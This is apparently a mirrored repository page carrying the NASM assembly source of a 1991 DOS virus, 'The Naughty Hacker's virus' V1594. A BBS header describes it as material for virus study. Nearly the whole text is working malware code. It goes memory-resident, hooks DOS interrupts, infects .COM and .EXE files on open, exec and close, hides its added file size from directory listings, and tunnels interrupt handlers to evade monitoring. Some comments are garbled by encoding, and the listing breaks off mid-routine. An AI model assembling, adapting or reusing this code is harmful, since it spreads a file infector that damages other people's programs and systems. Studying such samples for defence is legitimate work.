mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 00:28:50 +00:00
1010 lines
28 KiB
NASM
1010 lines
28 KiB
NASM
|
;****************************************************************************;
|
|||
|
; ;
|
|||
|
; -=][][][][][][][][][][][][][][][=- ;
|
|||
|
; -=] P E R F E C T C R I M E [=- ;
|
|||
|
; -=] +31.(o)79.426o79 [=- ;
|
|||
|
; -=] [=- ;
|
|||
|
; -=] For All Your H/P/A/V Files [=- ;
|
|||
|
; -=] SysOp: Peter Venkman [=- ;
|
|||
|
; -=] [=- ;
|
|||
|
; -=] +31.(o)79.426o79 [=- ;
|
|||
|
; -=] P E R F E C T C R I M E [=- ;
|
|||
|
; -=][][][][][][][][][][][][][][][=- ;
|
|||
|
; ;
|
|||
|
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
|||
|
; ;
|
|||
|
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
|||
|
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
|||
|
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
|||
|
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
|||
|
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
|||
|
; Is. Keep This Code in Responsible Hands! ;
|
|||
|
; ;
|
|||
|
;****************************************************************************;
|
|||
|
.radix 16
|
|||
|
|
|||
|
|
|||
|
;*********************************
|
|||
|
;* The Naughty Hacker's virus *
|
|||
|
;*VERSION 3.1 (And not the last.)*
|
|||
|
;* ( V1594 ) *
|
|||
|
;* Finished on the 10.04.1991 *
|
|||
|
;* *
|
|||
|
;* Glad to meet you friend! *
|
|||
|
;* *
|
|||
|
;*********************************
|
|||
|
|
|||
|
;
|
|||
|
; "It's hard to find a black cat in a dark room, especially if it's not there."
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> V1594 (<28><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> !@!?!).
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD>) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ......
|
|||
|
;
|
|||
|
; <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> TURBO ASSEMBLER Ver 1.03B. <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> ....
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> VIRUSWRITERS !
|
|||
|
;
|
|||
|
;
|
|||
|
; To be continued ...
|
|||
|
;
|
|||
|
|
|||
|
|
|||
|
call Start_Virus
|
|||
|
mov dx,offset Hellomsg
|
|||
|
mov ah,9
|
|||
|
int 21
|
|||
|
int 20
|
|||
|
|
|||
|
Hellomsg db 0a,0dh,7,'HI WORLD,GIVE ME COMMAND.COM !!!',0a,0dh,7,'$'
|
|||
|
|
|||
|
Virus_lenght equ endcode-adjust
|
|||
|
alllen equ buffer-adjust
|
|||
|
|
|||
|
adjust label word
|
|||
|
|
|||
|
|
|||
|
IP_save label word
|
|||
|
|
|||
|
First_3 Label Byte
|
|||
|
;For .COM file here stores
|
|||
|
ret
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
CS_save dw ? ;The first 3 bytes
|
|||
|
SP_save dw ?
|
|||
|
SS_save dw 0FFFF ;0FFFF For COM files
|
|||
|
|
|||
|
|
|||
|
signature:
|
|||
|
|
|||
|
db 'N.Hacker' ;It's me the HORSE !!!
|
|||
|
|
|||
|
date_stamp:
|
|||
|
|
|||
|
dd 10041991 ;10.04.1991
|
|||
|
|
|||
|
Run_The_Program:
|
|||
|
|
|||
|
pop ds ;Restore saved ds,es,ax
|
|||
|
pop es ;ds=es=PSP
|
|||
|
pop ax
|
|||
|
cmp cs:[bp+SS_save-adjust],0FFFF ;Run the infected program
|
|||
|
je Run_COM_File
|
|||
|
|
|||
|
mov ax,ds ;Calculate load segment
|
|||
|
add ax,10
|
|||
|
mov bx,ax
|
|||
|
add ax,cs:[bp+CS_save-adjust] ;Calculate CS value
|
|||
|
add bx,cs:[bp+SS_save-adjust] ;Calculate SS value
|
|||
|
mov ss,bx ;Run .EXE program
|
|||
|
mov sp,word ptr cs:[bp+SP_save-adjust]
|
|||
|
push ax
|
|||
|
push word ptr cs:[bp+IP_save-adjust]
|
|||
|
retf
|
|||
|
|
|||
|
Run_COM_File:
|
|||
|
|
|||
|
mov di,100
|
|||
|
mov si,bp
|
|||
|
movsb ;Restore the first 3 bytes
|
|||
|
movsw ;Run .COM program
|
|||
|
mov bx,100
|
|||
|
push bx
|
|||
|
sub bh,bh
|
|||
|
ret
|
|||
|
|
|||
|
;*******************************************************************
|
|||
|
; *
|
|||
|
; This is the program entry.... *
|
|||
|
; *
|
|||
|
;*******************************************************************
|
|||
|
|
|||
|
|
|||
|
Start_Virus:
|
|||
|
|
|||
|
call Get_IP ;This is to get the IP value.
|
|||
|
|
|||
|
Get_IP:
|
|||
|
pop bp ;Get it in BP.
|
|||
|
sub bp,Get_IP-adjust ;adjust BP point to the begining
|
|||
|
cld ;Clear direction flag
|
|||
|
push ax ;Save some registres
|
|||
|
push es
|
|||
|
push ds
|
|||
|
mov es,[2] ;get last segment
|
|||
|
mov di,Run_The_Program-adjust ;(last segment=segment of virus)
|
|||
|
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov si,di
|
|||
|
add si,bp
|
|||
|
mov cx,endcode-Run_The_Program
|
|||
|
rep cmpsb ;check if virus is in memory
|
|||
|
pop ds
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
je Run_The_Program ;If so then run the program
|
|||
|
|
|||
|
mov word ptr cs:[bp+handle-adjust],0ffff ;set handle_save
|
|||
|
mov ax,ds
|
|||
|
dec ax
|
|||
|
mov ds,ax ;ds=MCB
|
|||
|
sub word ptr [3],80 ;Set block size
|
|||
|
sub word ptr [12],80 ;Set last segment
|
|||
|
mov es,[12] ;steal some memory (2K)
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
sub di,di
|
|||
|
mov si,bp ;prepare to move in high mem
|
|||
|
mov cx,alllen ;will move virus+variables
|
|||
|
rep movsb ;copy there
|
|||
|
push cs
|
|||
|
mov ax,Run_The_Program-adjust
|
|||
|
add ax,bp
|
|||
|
push ax
|
|||
|
push es
|
|||
|
mov ax,offset Set_Vectors-adjust ;Set vectors
|
|||
|
push ax
|
|||
|
retf
|
|||
|
|
|||
|
Find_First_Next:
|
|||
|
|
|||
|
call Call_Original_INT_21h ;fuck when do the dir command
|
|||
|
push bx
|
|||
|
push es
|
|||
|
push ax
|
|||
|
or al,al
|
|||
|
jnz Go_Out_ ;if error
|
|||
|
|
|||
|
mov ah,2f ;get DTA address
|
|||
|
int 21
|
|||
|
|
|||
|
mov al,byte ptr es:[bx+30d] ;Seconds in al
|
|||
|
and al,31d ;Mask seconds
|
|||
|
cmp al,60d/2 ;Seconds=60?
|
|||
|
jne Go_Out_
|
|||
|
|
|||
|
mov ax,es:[bx+36d]
|
|||
|
mov dx,es:[bx+38d] ;Check File size
|
|||
|
cmp ax,Virus_lenght*2
|
|||
|
sbb dx,0
|
|||
|
jb Go_Out_
|
|||
|
|
|||
|
|
|||
|
Adjust_Size:
|
|||
|
|
|||
|
sub es:[bx+28d+7+1],Virus_lenght ;Adjust size
|
|||
|
sbb es:[bx+28d+2+7+1],0
|
|||
|
|
|||
|
Go_Out_:
|
|||
|
|
|||
|
pop ax
|
|||
|
pop es ;Return to caller
|
|||
|
pop bx
|
|||
|
iret
|
|||
|
|
|||
|
Find_First_Next1:
|
|||
|
|
|||
|
call Call_Original_INT_21h
|
|||
|
pushf
|
|||
|
push ax
|
|||
|
push bx ;fuck again
|
|||
|
push es
|
|||
|
jc Go_Out_1
|
|||
|
|
|||
|
mov ah,2f
|
|||
|
int 21
|
|||
|
|
|||
|
mov al,es:[bx+22d]
|
|||
|
and al,31d
|
|||
|
cmp al,60d/2
|
|||
|
jne Go_Out_1
|
|||
|
|
|||
|
mov ax,es:[bx+26d]
|
|||
|
mov dx,es:[bx+28d]
|
|||
|
cmp ax,Virus_lenght*2
|
|||
|
sbb dx,0
|
|||
|
jb Go_Out_1
|
|||
|
|
|||
|
Adjust_Size1:
|
|||
|
|
|||
|
sub es:[bx+26d],Virus_lenght
|
|||
|
sbb es:[bx+28d],0
|
|||
|
|
|||
|
Go_Out_1:
|
|||
|
|
|||
|
pop es
|
|||
|
pop bx
|
|||
|
pop ax ; Dummy proc far
|
|||
|
popf ; ret 2
|
|||
|
db 0ca,2,0 ;retf 2 ; Dummy endp => BUT too long...
|
|||
|
|
|||
|
|
|||
|
;*************************************
|
|||
|
; *
|
|||
|
; Int 21 entry point. *
|
|||
|
; *
|
|||
|
;**************************:KIIII<49>*****
|
|||
|
|
|||
|
|
|||
|
|
|||
|
INT_21h_Entry_Point:
|
|||
|
|
|||
|
|
|||
|
cmp ah,11
|
|||
|
je Find_First_Next ;Find First Next (old)
|
|||
|
cmp ah,12
|
|||
|
je Find_First_Next
|
|||
|
|
|||
|
cmp ah,4e ;Find First Next (new)
|
|||
|
je Find_First_Next1
|
|||
|
cmp ah,4f
|
|||
|
je Find_First_Next1
|
|||
|
|
|||
|
cmp ah,6ch
|
|||
|
jne not_create ;Create (4.X)
|
|||
|
test bl,1
|
|||
|
jz not_create
|
|||
|
jnz create
|
|||
|
|
|||
|
not_create:
|
|||
|
|
|||
|
cmp ah,3ch ;Create (3.X)
|
|||
|
je create
|
|||
|
cmp ah,5bh
|
|||
|
je create
|
|||
|
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push si
|
|||
|
push di
|
|||
|
push bp
|
|||
|
push ds
|
|||
|
push es
|
|||
|
|
|||
|
mov byte ptr cs:[function-adjust],ah
|
|||
|
|
|||
|
cmp ah,6ch ;Open (4.X)
|
|||
|
je create_
|
|||
|
|
|||
|
cmp ah,3e ;Close
|
|||
|
je close_
|
|||
|
|
|||
|
cmp ax,4b00 ;Exec
|
|||
|
je Function_4Bh
|
|||
|
|
|||
|
cmp ah,17 ;Rename (old)
|
|||
|
je ren_FCB
|
|||
|
|
|||
|
cmp ah,56 ;Rename (new)
|
|||
|
je Function_4Bh
|
|||
|
|
|||
|
cmp ah,43 ;Change attributes
|
|||
|
je Function_4Bh
|
|||
|
|
|||
|
cmp ah,3dh ;Open (3.X)
|
|||
|
je open
|
|||
|
|
|||
|
Return_Control:
|
|||
|
|
|||
|
pop es
|
|||
|
pop ds
|
|||
|
pop bp
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
|
|||
|
Go_out:
|
|||
|
|
|||
|
jmp dword ptr cs:[current_21h-adjust] ;go to the old int 21
|
|||
|
|
|||
|
create_:
|
|||
|
|
|||
|
or bl,bl ;Create file?
|
|||
|
jnz Return_Control
|
|||
|
mov dx,si
|
|||
|
jmp Function_4Bh
|
|||
|
|
|||
|
ren_FCB:
|
|||
|
|
|||
|
cld
|
|||
|
inc dx
|
|||
|
mov si,dx
|
|||
|
mov di,offset buffer-adjust
|
|||
|
push di
|
|||
|
push cs
|
|||
|
pop es ;Convert FCB format Fname into ASCIIZ string
|
|||
|
mov cx,8
|
|||
|
rep movsb
|
|||
|
mov al,'.'
|
|||
|
stosb
|
|||
|
mov cx,3
|
|||
|
rep movsb
|
|||
|
sub al,al
|
|||
|
stosb
|
|||
|
pop dx
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
jmp Function_4Bh
|
|||
|
|
|||
|
create:
|
|||
|
|
|||
|
; cmp word ptr cs:[handle-adjust],0ffff
|
|||
|
; jne Go_out
|
|||
|
|
|||
|
call Call_Original_INT_21h
|
|||
|
jc Error
|
|||
|
mov word ptr cs:[handle-adjust],ax
|
|||
|
jnc Exit_
|
|||
|
Error:
|
|||
|
mov word ptr cs:[handle-adjust],0ffff ;Useless
|
|||
|
Exit_:
|
|||
|
; retf 2
|
|||
|
db 0ca,2,0
|
|||
|
|
|||
|
close_:
|
|||
|
cmp word ptr cs:[handle-adjust],0ffff
|
|||
|
je Return_Control
|
|||
|
cmp bx,word ptr cs:[handle-adjust]
|
|||
|
jne Return_Control
|
|||
|
|
|||
|
mov ah,45
|
|||
|
call Infect_It
|
|||
|
mov word ptr cs:[handle-adjust],0ffff
|
|||
|
jmp Return_Control
|
|||
|
|
|||
|
Function_4Bh:
|
|||
|
|
|||
|
mov ax,3d00h
|
|||
|
open:
|
|||
|
call Infect_It
|
|||
|
jmp Return_Control
|
|||
|
|
|||
|
;******************************************
|
|||
|
; *
|
|||
|
; This infects the programs... *
|
|||
|
; *
|
|||
|
;******************************************
|
|||
|
|
|||
|
Infect_It:
|
|||
|
|
|||
|
call Call_Original_INT_21h ;this is the infecting part
|
|||
|
jnc No_error
|
|||
|
ret
|
|||
|
|
|||
|
No_error:
|
|||
|
|
|||
|
xchg ax,bp
|
|||
|
mov byte ptr cs:[flag-adjust],0
|
|||
|
mov ah,54
|
|||
|
call Call_Original_INT_21h
|
|||
|
mov byte ptr cs:[veri-adjust],al
|
|||
|
cmp al,1 ;Switch off verify...
|
|||
|
jne Go_On_Setting
|
|||
|
mov ax,2e00
|
|||
|
call Call_Original_INT_21h
|
|||
|
|
|||
|
Go_On_Setting:
|
|||
|
|
|||
|
push cs
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
pop es
|
|||
|
mov dx,offset DOS_13h-adjust
|
|||
|
mov bx,dx ;Set New DOS int 13h
|
|||
|
mov ah,13
|
|||
|
call Call_Original_INT_2Fh
|
|||
|
|
|||
|
mov ax,3513
|
|||
|
call Call_Original_INT_21h
|
|||
|
push bx
|
|||
|
push es
|
|||
|
|
|||
|
mov word ptr cs:[current_13h-adjust],bx
|
|||
|
mov word ptr cs:[current_13h-adjust+2],es
|
|||
|
|
|||
|
mov ah,25
|
|||
|
mov dx,INT_13h_entry-adjust ;Set int 13h
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
call Call_Original_INT_21h
|
|||
|
|
|||
|
mov ax,3524
|
|||
|
call Call_Original_INT_21h
|
|||
|
push bx
|
|||
|
push es
|
|||
|
|
|||
|
mov ah,25
|
|||
|
mov dx,INT_24h_entry-adjust ;Set int 24h (Useless maybe...).
|
|||
|
call Call_Original_INT_21h
|
|||
|
|
|||
|
xchg bx,bp
|
|||
|
push bx
|
|||
|
mov ax,1220
|
|||
|
call Call_Original_INT_2Fh
|
|||
|
mov bl,es:[di] ;Remember the good old V512 ?
|
|||
|
mov ax,1216
|
|||
|
call Call_Original_INT_2Fh
|
|||
|
pop bx
|
|||
|
add di,11
|
|||
|
|
|||
|
mov byte ptr es:[di-15d],2
|
|||
|
mov ax,es:[di]
|
|||
|
mov dx,es:[di+2]
|
|||
|
cmp ax,Virus_lenght+1
|
|||
|
sbb dx,0
|
|||
|
jnb Go_on
|
|||
|
jmp close
|
|||
|
Go_on:
|
|||
|
cmp byte ptr cs:[function-adjust],3dh
|
|||
|
je Scan_name
|
|||
|
cmp byte ptr cs:[function-adjust],6ch
|
|||
|
jne Dont_Scan_Name
|
|||
|
|
|||
|
Scan_name:
|
|||
|
|
|||
|
push di
|
|||
|
add di,0f
|
|||
|
mov si,offset fname-adjust ;wasn't that the last opened file?
|
|||
|
cld
|
|||
|
mov cx,8+3
|
|||
|
rep cmpsb
|
|||
|
pop di
|
|||
|
jne Dont_Scan_Name
|
|||
|
jmp close
|
|||
|
|
|||
|
Dont_Scan_Name:
|
|||
|
|
|||
|
cmp es:[di+18],'MO'
|
|||
|
jne Check_For_EXE ;check for .COM file
|
|||
|
cmp byte ptr es:[di+17],'C'
|
|||
|
jne Check_For_EXE
|
|||
|
jmp com
|
|||
|
|
|||
|
Check_For_EXE:
|
|||
|
|
|||
|
cmp es:[di+18],'EX'
|
|||
|
jne Not_good ;check for .EXE file
|
|||
|
cmp byte ptr es:[di+17],'E'
|
|||
|
je Check_For_Valid_EXE
|
|||
|
|
|||
|
Not_good:
|
|||
|
|
|||
|
jmp close
|
|||
|
|
|||
|
Check_For_Valid_EXE:
|
|||
|
|
|||
|
call Read_First_18
|
|||
|
cmp word ptr [si],'ZM'
|
|||
|
je Valid_EXE ;check for valid .EXE file
|
|||
|
cmp word ptr [si],'MZ'
|
|||
|
je Valid_EXE
|
|||
|
jmp close
|
|||
|
|
|||
|
Valid_EXE:
|
|||
|
|
|||
|
cmp word ptr [si+0c],0ffff ;only low-mem .EXE
|
|||
|
je Low_Mem
|
|||
|
jmp close
|
|||
|
|
|||
|
Low_Mem:
|
|||
|
|
|||
|
mov cx,[si+16]
|
|||
|
add cx,[si+8] ;Something common with EDDIE..
|
|||
|
mov ax,10
|
|||
|
mul cx
|
|||
|
add ax,[si+14]
|
|||
|
adc dx,0
|
|||
|
mov cx,es:[di]
|
|||
|
sub cx,ax
|
|||
|
xchg cx,ax
|
|||
|
mov cx,es:[di+2]
|
|||
|
sbb cx,dx
|
|||
|
or cx,cx
|
|||
|
jnz Not_Infected_EXE ;infected?
|
|||
|
cmp ax,(endcode-Start_Virus)
|
|||
|
jne Not_Infected_EXE
|
|||
|
jmp close
|
|||
|
|
|||
|
Not_Infected_EXE:
|
|||
|
|
|||
|
mov ax,[si+10]
|
|||
|
mov [SP_save-adjust],ax
|
|||
|
mov ax,[si+0e]
|
|||
|
mov [SS_save-adjust],ax
|
|||
|
mov ax,[si+14]
|
|||
|
mov [IP_save-adjust],ax
|
|||
|
mov ax,[si+16]
|
|||
|
mov [CS_save-adjust],ax ;set the new header
|
|||
|
mov ax,es:[di]
|
|||
|
mov dx,es:[di+2]
|
|||
|
|
|||
|
add ax,Virus_lenght
|
|||
|
adc dx,0
|
|||
|
mov cx,200 ;(C) by Lubo & Jan...
|
|||
|
div cx
|
|||
|
mov [si+2],dx
|
|||
|
or dx,dx
|
|||
|
jz OK_MOD
|
|||
|
inc ax
|
|||
|
|
|||
|
OK_MOD:
|
|||
|
mov [si+4],ax
|
|||
|
mov ax,es:[di]
|
|||
|
mov dx,es:[di+2]
|
|||
|
|
|||
|
mov cx,4
|
|||
|
push ax
|
|||
|
|
|||
|
Compute:
|
|||
|
|
|||
|
shr dx,1
|
|||
|
rcr ax,1
|
|||
|
loop Compute
|
|||
|
pop dx
|
|||
|
and dx,0f
|
|||
|
|
|||
|
sub ax,[si+8]
|
|||
|
add dx,Start_Virus-adjust
|
|||
|
adc ax,0
|
|||
|
mov [si+14],dx
|
|||
|
mov [si+16],ax
|
|||
|
add ax,(Virus_lenght)/16d+1
|
|||
|
mov [si+0eh],ax
|
|||
|
mov [si+10],100
|
|||
|
write:
|
|||
|
mov ax,5700
|
|||
|
call Call_Original_INT_21h
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
|
|||
|
sub cx,cx
|
|||
|
mov es:[di+4],cx
|
|||
|
mov es:[di+6],cx
|
|||
|
mov cl,20
|
|||
|
xchg cl,byte ptr es:[di-0dh]
|
|||
|
push cx
|
|||
|
mov ah,40 ;this writes the first few bytes and glues the virus
|
|||
|
mov dx,buffer-adjust
|
|||
|
mov cx,18
|
|||
|
|
|||
|
call Call_Original_INT_21h
|
|||
|
mov ax,es:[di]
|
|||
|
mov es:[di+4],ax
|
|||
|
mov ax,es:[di+2]
|
|||
|
mov es:[di+6],ax
|
|||
|
call Check_For_COMMAND ;(C)
|
|||
|
jne Dont_Adjust_Size
|
|||
|
sub es:[di+4],Virus_lenght
|
|||
|
sbb es:[di+6],0 ;???????????????????????????????
|
|||
|
|
|||
|
Dont_Adjust_Size:
|
|||
|
|
|||
|
mov ah,40
|
|||
|
sub dx,dx
|
|||
|
mov cx,Virus_lenght
|
|||
|
call Call_Original_INT_21h
|
|||
|
|
|||
|
pop cx
|
|||
|
mov byte ptr es:[di-0dh],cl
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
|
|||
|
cmp byte ptr cs:[flag-adjust],0ff
|
|||
|
je Set_Time_and_Date
|
|||
|
exit:
|
|||
|
call Check_For_COMMAND
|
|||
|
je Set_Time_and_Date
|
|||
|
and cl,11100000b
|
|||
|
or cl,60d/2
|
|||
|
|
|||
|
Set_Time_and_Date:
|
|||
|
|
|||
|
mov ax,5701
|
|||
|
call Call_Original_INT_21h
|
|||
|
close:
|
|||
|
|
|||
|
mov ah,3e
|
|||
|
call Call_Original_INT_21h
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
mov si,di
|
|||
|
add si,0f
|
|||
|
mov di,fname-adjust
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov cx,8+3 ;save the fname to a quit place
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
cmp byte ptr cs:[flag-adjust],0ff
|
|||
|
jne Dont_Clear_Buffers
|
|||
|
mov ah,0dh ;if error occured->clear disk buffers
|
|||
|
|
|||
|
call Call_Original_INT_21h
|
|||
|
|
|||
|
Dont_Clear_Buffers:
|
|||
|
|
|||
|
les bx,[org_13h-adjust]
|
|||
|
lds dx,[org_13h-adjust]
|
|||
|
mov ah,13
|
|||
|
call Call_Original_INT_2Fh
|
|||
|
|
|||
|
cmp byte ptr cs:[veri-adjust],1
|
|||
|
jne Restore_Vectors
|
|||
|
mov ax,2e01
|
|||
|
|
|||
|
call Call_Original_INT_21h
|
|||
|
|
|||
|
Restore_Vectors:
|
|||
|
|
|||
|
sub ax,ax
|
|||
|
mov ds,ax
|
|||
|
pop [24*4+2]
|
|||
|
pop [24*4]
|
|||
|
pop [13*4+2]
|
|||
|
pop [13*4] ;restore vectors and return
|
|||
|
ret
|
|||
|
com:
|
|||
|
test byte ptr es:[di-0dh],4 ;if it is a system file
|
|||
|
jnz Not_OK_COM_File ;I had some problems here with
|
|||
|
;V1160 & V1776 (with the ball)
|
|||
|
cmp es:[di],65535d-Virus_lenght*2-100
|
|||
|
ja Not_OK_COM_File
|
|||
|
|
|||
|
call Read_First_18
|
|||
|
cmp byte ptr [si],0E9
|
|||
|
jne OK_COM_file
|
|||
|
mov ax,es:[di]
|
|||
|
sub ax,[si+1] ;infected?
|
|||
|
cmp ax,(endcode-Start_Virus+3)
|
|||
|
je Not_OK_COM_File
|
|||
|
|
|||
|
OK_COM_file:
|
|||
|
|
|||
|
mov word ptr [SS_save-adjust],0FFFF
|
|||
|
push si
|
|||
|
lodsb
|
|||
|
mov word ptr [First_3-adjust],ax
|
|||
|
lodsw
|
|||
|
mov word ptr [First_3-adjust+1],ax
|
|||
|
pop si
|
|||
|
mov ax,es:[di]
|
|||
|
add ax,Start_Virus-adjust-3
|
|||
|
call Check_For_COMMAND
|
|||
|
jne Normally
|
|||
|
sub ax,Virus_lenght
|
|||
|
|
|||
|
Normally:
|
|||
|
|
|||
|
mov byte ptr [si],0E9
|
|||
|
mov word ptr [si+1],ax
|
|||
|
jmp write
|
|||
|
|
|||
|
Not_OK_COM_File:
|
|||
|
|
|||
|
jmp close
|
|||
|
|
|||
|
Set_Vectors:
|
|||
|
|
|||
|
sub ax,ax
|
|||
|
mov ds,ax
|
|||
|
|
|||
|
push [1*4]
|
|||
|
push [1*4+2] ; <= (C) by N.Hacker.
|
|||
|
|
|||
|
pushf
|
|||
|
pushf
|
|||
|
pushf
|
|||
|
pushf
|
|||
|
|
|||
|
mov byte ptr cs:[flag-adjust],ah
|
|||
|
mov byte ptr cs:[my_flag-adjust],ah
|
|||
|
mov word ptr cs:[limit-adjust],300
|
|||
|
mov word ptr cs:[mem_-adjust],org_21h-adjust
|
|||
|
|
|||
|
mov [1*4],offset trap-adjust
|
|||
|
mov [1*4+2],cs
|
|||
|
|
|||
|
call set_trace
|
|||
|
|
|||
|
mov ax,3521
|
|||
|
|
|||
|
call dword ptr [21h*4]
|
|||
|
|
|||
|
|
|||
|
mov byte ptr cs:[flag-adjust],0
|
|||
|
mov word ptr cs:[mem_-adjust],org_2fh-adjust
|
|||
|
|
|||
|
call set_trace
|
|||
|
|
|||
|
mov ax,1200
|
|||
|
|
|||
|
call dword ptr [2fh*4] ;do trace int 2f
|
|||
|
|
|||
|
|
|||
|
mov byte ptr cs:[flag-adjust],0
|
|||
|
mov byte ptr cs:[my_flag-adjust],0FF
|
|||
|
mov word ptr cs:[limit-adjust],0C800
|
|||
|
mov word ptr cs:[mem_-adjust],org_13h-adjust
|
|||
|
|
|||
|
call set_trace
|
|||
|
|
|||
|
sub ax,ax
|
|||
|
mov dl,al
|
|||
|
|
|||
|
call dword ptr [13h*4] ;do trace int 13
|
|||
|
|
|||
|
mov byte ptr cs:[flag-adjust],0
|
|||
|
mov word ptr cs:[limit-adjust],0F000
|
|||
|
mov word ptr cs:[mem_-adjust],Floppy_org_13h-adjust
|
|||
|
|
|||
|
call set_trace
|
|||
|
|
|||
|
sub ax,ax
|
|||
|
mov dl,al
|
|||
|
|
|||
|
call dword ptr [13h*4]
|
|||
|
|
|||
|
pop [1*4+2]
|
|||
|
pop [1*4]
|
|||
|
|
|||
|
les ax,[21*4]
|
|||
|
mov word ptr cs:[current_21h-adjust],ax ;get old int 21
|
|||
|
mov word ptr cs:[current_21h-adjust+2],es
|
|||
|
mov [21*4], INT_21h_Entry_Point-adjust ;set it
|
|||
|
mov [21*4+2],cs
|
|||
|
retf
|
|||
|
|
|||
|
set_trace:
|
|||
|
|
|||
|
pushf
|
|||
|
pop ax
|
|||
|
or ax,100
|
|||
|
push ax
|
|||
|
popf
|
|||
|
ret
|
|||
|
|
|||
|
trap:
|
|||
|
push bp
|
|||
|
mov bp,sp
|
|||
|
push bx
|
|||
|
push di
|
|||
|
cmp byte ptr cs:[flag-adjust],0ff
|
|||
|
je off
|
|||
|
mov di,word ptr cs:[mem_-adjust]
|
|||
|
mov bx,word ptr cs:[limit-adjust]
|
|||
|
cmp [bp+4],bx
|
|||
|
pushf
|
|||
|
cmp word ptr cs:[my_flag-adjust],0ff
|
|||
|
jne It_Is_JA
|
|||
|
|
|||
|
popf
|
|||
|
jb Go_out_of_trap
|
|||
|
